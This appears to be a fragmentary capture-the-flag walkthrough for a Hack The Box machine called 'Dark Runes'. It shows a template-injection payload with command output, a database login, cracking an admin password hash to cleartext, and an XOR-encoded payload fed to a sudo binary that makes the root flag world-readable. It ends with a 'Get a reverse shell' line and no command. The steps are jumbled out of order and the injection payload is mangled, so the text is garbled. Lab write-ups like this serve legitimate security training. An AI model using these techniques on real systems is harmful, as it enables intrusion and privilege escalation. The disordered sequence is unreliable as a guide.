HTB Dark Runes
% with a=request a % endwith % uid=33(www-data) gid=33(www-data) groups=33(www-data)
Try re-creating the rune_decoder binary and see if you can find a different way to escalate without touching the root flag.
psql -U rune_walker -h localhost darkrunes -W
Dump tables → users table has a row for admin with a hash (bcrypt). Crack with John or hashcat → admin:darkrun3s2023!
sudo /usr/local/bin/rune_decoder /var/runes/evil.rune
Now read /root/root.txt directly.
Machine Difficulty: Medium
Category: Web, Cryptography, Binary Exploitation, Linux
May your shell never drop, and your hashes always crack. 🔥
echo -n "RUNECMD:chmod 777 /root/root.txt" > payload
python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune
Move to /var/runes/evil.rune and run:
✅ RCE achieved. Get a reverse shell: